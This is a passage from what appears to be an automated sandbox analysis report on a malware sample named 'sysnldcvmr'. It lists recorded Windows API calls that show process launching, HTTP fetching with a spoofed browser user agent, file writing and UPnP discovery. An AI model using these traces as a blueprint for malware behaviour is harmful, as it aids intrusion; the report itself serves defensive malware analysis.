                                                                                                                                                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B33E
                                                                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040B35D
                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040B372
                                                                                                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040B3D8
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040B3E2
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040B3EC
                                                                                                                                                                                                                                                      • Part of subcall function 0040D4A0: NtQuerySystemTime.NTDLL(0040B3B5,?,0040B3B5,00000000), ref: 0040D4AA
                                                                                                                                                                                                                                                      • Part of subcall function 0040D4A0: RtlTimeToSecondsSince1980.NTDLL(0040B3B5,?), ref: 0040D4B8
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                                                                                                                                                                                                    • String ID: Vz@$.ou
                                                                                                                                                                                                                                                    • API String ID: 439099756-1244017076
                                                                                                                                                                                                                                                    • Opcode ID: ee7dbac5f2ba26ac0a343239ed6675f37eb8ab6d8ccb57ef49a08724b9c129be
                                                                                                                                                                                                                                                    • Instruction ID: 3b431581fb8605495e02e5545908ab4f756817927d1539066ca4ce1953719e7c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee7dbac5f2ba26ac0a343239ed6675f37eb8ab6d8ccb57ef49a08724b9c129be
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 91411C74E40309EBDB10DFA4DC4ABAEB774EB44704F208569EA11BA2C1C7B96541CB9D
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.NTDLL ref: 0040E98E
                                                                                                                                                                                                                                                    • memset.NTDLL ref: 0040E99E
                                                                                                                                                                                                                                                    • CreateProcessW.KERNEL32(00000000,Gy@,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040E9D7
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040E9E7
                                                                                                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,Gy@,00000000,00000000,00000000), ref: 0040EA02
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040EA1C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                                                                                                                                                                                                    • String ID: $D$Gy@$open
                                                                                                                                                                                                                                                    • API String ID: 3787208655-4184347819
                                                                                                                                                                                                                                                    • Opcode ID: 5ee7fdc591246df9419d0b661744b6941cf0467c5ddd8ade60e7ca7f41f9299c
                                                                                                                                                                                                                                                    • Instruction ID: afb7e97e53159593a654a1f5a0506a904f07d925a59540ad2b26a1d3cea08ed0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ee7fdc591246df9419d0b661744b6941cf0467c5ddd8ade60e7ca7f41f9299c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08114271A90308BBE710DB91CD46FDE7774AB04B00F200129F6087E2C1D6F9AA54CB59
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0040D2D6
                                                                                                                                                                                                                                                    • GetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2,?,000000FF), ref: 0040D2DD
                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0040D2E8
                                                                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2,?,000000FF), ref: 0040D2EF
                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(00407AD2,00000000), ref: 0040D312
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(000000FB), ref: 0040D347
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040D392
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040D3AE
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 0040D3DE
                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0040D3ED
                                                                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2), ref: 0040D3F4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3862671961-0
                                                                                                                                                                                                                                                    • Opcode ID: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                                                                                                                                                                                                    • Instruction ID: a8d0ef9cc0f8c3f9fe641a145e15df681aa384361be6a62e8494921e8eef4e23
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A411A74D00209EFDB04DFE4D888BAEBB71EB44315F14816AE916A7380D7789A85CF5A
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(00415E30,?,?,?,?,?,00407A20), ref: 00405BCB
                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00416060,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00407A20), ref: 00405BE5
                                                                                                                                                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405C06
                                                                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405C25
                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 00405C3E
                                                                                                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00405CCB
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00405CD5
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 00405CDF
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                                                                                                                                                                                                    • String ID: .ou
                                                                                                                                                                                                                                                    • API String ID: 3956458805-3683031111
                                                                                                                                                                                                                                                    • Opcode ID: b6454fe67246050de154b4b2d7b685814819646854cbf1c4f394f4a459172caa
                                                                                                                                                                                                                                                    • Instruction ID: 44e1aa5071e985e1939c8a19f3b292d5e35966d71e561f6040ad28af9ac572d1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6454fe67246050de154b4b2d7b685814819646854cbf1c4f394f4a459172caa
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B31FD74E44309EBEB14DBA4CD49BAFBB74EB48700F208569E601772C0D7B96941CF99
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00415E30,00000000,0040B8F2,006A0266,?,0040B90E,00000000,0040D0A4,?), ref: 0040606F
                                                                                                                                                                                                                                                    • memcpy.NTDLL(?,00000000,00000100), ref: 00406101
                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00416060,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00406225
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00406287
                                                                                                                                                                                                                                                    • FlushFileBuffers.KERNEL32(000000FF), ref: 00406293
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040629D
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00415E30,?,?,?,?,?,?,0040B90E,00000000,0040D0A4,?), ref: 004062A8
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
                                                                                                                                                                                                                                                    • String ID: .ou
                                                                                                                                                                                                                                                    • API String ID: 1457358591-3683031111
                                                                                                                                                                                                                                                    • Opcode ID: b744e7b7a8629e3496ebe2098ab67372d645442e6c28ada4e438c42de121c9cd
                                                                                                                                                                                                                                                    • Instruction ID: bb102638da67a563b53aa46b2a5b6ce2f3b38349fb156310049a7a66f3822ae6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b744e7b7a8629e3496ebe2098ab67372d645442e6c28ada4e438c42de121c9cd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D71DEB5E002099BCB04DF94D981FEFB7B1BB88304F14816DE505BB382D779A951CBA5
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401DB0
                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401DC3
                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401E5B
                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00401EF6
                                                                                                                                                                                                                                                    • setsockopt.WS2_32 ref: 00401F2C
                                                                                                                                                                                                                                                    • closesocket.WS2_32(?), ref: 00401F39
                                                                                                                                                                                                                                                      • Part of subcall function 0040D4A0: NtQuerySystemTime.NTDLL(0040B3B5,?,0040B3B5,00000000), ref: 0040D4AA
                                                                                                                                                                                                                                                      • Part of subcall function 0040D4A0: RtlTimeToSecondsSince1980.NTDLL(0040B3B5,?), ref: 0040D4B8
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 671207744-0
                                                                                                                                                                                                                                                    • Opcode ID: 455a785a1462a168860a16a7b96cb30f84d4113cb7820f003e1e275d5cc4599c
                                                                                                                                                                                                                                                    • Instruction ID: a48952fab395babe4cfd63b323185ec8fb23c48b53ef468cda2161a158f186bf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 455a785a1462a168860a16a7b96cb30f84d4113cb7820f003e1e275d5cc4599c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A51B075608702ABC704DF29D888B9BFBE5BF88314F40862EF85D93360D774A545CB96
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040D8DE
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040D8EE
                                                                                                                                                                                                                                                    • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040D90B
                                                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040D921
                                                                                                                                                                                                                                                    • StrChrA.SHLWAPI(?,0000000D), ref: 0040D94E
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Sleeprecvfrom
                                                                                                                                                                                                                                                    • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                                                                                                                                                                                                    • API String ID: 668330359-3973262388
                                                                                                                                                                                                                                                    • Opcode ID: 64c51f4f778a0849bb65c465f972bc246fe4ea33ddc01750ea485b3e9e3c6488
                                                                                                                                                                                                                                                    • Instruction ID: aa1d0310fbaa0e5548ad160d3530673878f91993e129ff42f305da2a80d3425b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 64c51f4f778a0849bb65c465f972bc246fe4ea33ddc01750ea485b3e9e3c6488
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88215EB5D00218ABDB20DF64DC49BE97774AB04708F1486E9E719B62C0C7B95ACA8F5C
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040EA47
                                                                                                                                                                                                                                                    • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EA66
                                                                                                                                                                                                                                                    • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040EA8F
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040EAB8
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040EAC2
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040EACD
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040EA42
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                                                                                                                                                                                                    • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    • API String ID: 2743515581-2960703779
                                                                                                                                                                                                                                                    • Opcode ID: ef8e19ed345852c8d52971dd1004b0fcc021cc447378e9d991bc7cd61a6891ce
                                                                                                                                                                                                                                                    • Instruction ID: 45b81d3650d60dd7d70083547d95fe89803667d47bfd0af2cf5eef3cde06382e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef8e19ed345852c8d52971dd1004b0fcc021cc447378e9d991bc7cd61a6891ce
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4021E774A40308BBEB11DB94CC49FEEB775BB48705F1085A9FA11AA2C0C7B96A40CB55
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E2FC
                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E34B
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E35F
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E377
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                                                                    • String ID: device$deviceType
                                                                                                                                                                                                                                                    • API String ID: 1602765415-3511266565
                                                                                                                                                                                                                                                    • Opcode ID: 1b177aca5382db3f1c66da14849aee522d75b48b0e19709232399be15e741896
                                                                                                                                                                                                                                                    • Instruction ID: d9bf12878483276118e69e011fb1eaaed98ea0d23904e8601ea4f62f39df24ad
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b177aca5382db3f1c66da14849aee522d75b48b0e19709232399be15e741896
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4412D74A0020ADFCB04DF95C884FAFBBB5BF49304F108969E915A7390D778AD81CB95
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E19C
                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E1EB
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E1FF
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E217
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                                                                    • String ID: service$serviceType
                                                                                                                                                                                                                                                    • API String ID: 1602765415-3667235276
                                                                                                                                                                                                                                                    • Opcode ID: 99a16f71be16d8847cb7d1021c7ddccdc4dc2b0592ef80971ad883e08ff36aa9
                                                                                                                                                                                                                                                    • Instruction ID: 8be64e74ab35422ce5b67f5b255e261f781d2e412f5a45cda6e842047ddde31e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99a16f71be16d8847cb7d1021c7ddccdc4dc2b0592ef80971ad883e08ff36aa9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB41E874A0020ADFCB14CF99C884BAFB7B9BF48304F1085ADE515A7390D778AA81CF95
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3168844106-0
                                                                                                                                                                                                                                                    • Opcode ID: d030d70e23b1ee81df40ddde676cc41bbc8b28927f5a1e966705551878972145
                                                                                                                                                                                                                                                    • Instruction ID: 16d4c05c25790a512fd8f3a1e6e85bd280fefa1845e4e3e4af960acff63a7a98
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d030d70e23b1ee81df40ddde676cc41bbc8b28927f5a1e966705551878972145
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE31D1722012059FC310AFB5FD8CAD7B7A8FF44324F04863EE559D3280D778A4449BA9
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E2FC
                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E34B
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E35F
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E377
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                                                                    • String ID: device$deviceType
                                                                                                                                                                                                                                                    • API String ID: 1602765415-3511266565
                                                                                                                                                                                                                                                    • Opcode ID: 7884966aedb5b48ec66d747cdb098c486fa550d692640b6eadd274145b97d250
                                                                                                                                                                                                                                                    • Instruction ID: b41677b7307b510c0c46b42eeb4edde7184acd44519d028b9e49cf38c7e22350
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7884966aedb5b48ec66d747cdb098c486fa550d692640b6eadd274145b97d250
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24310C74A0020ADFCB14DF95C884FAFBBB5BF88304F108969E915B7390D778A981CB95
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E19C
                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E1EB
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E1FF
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040E217
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
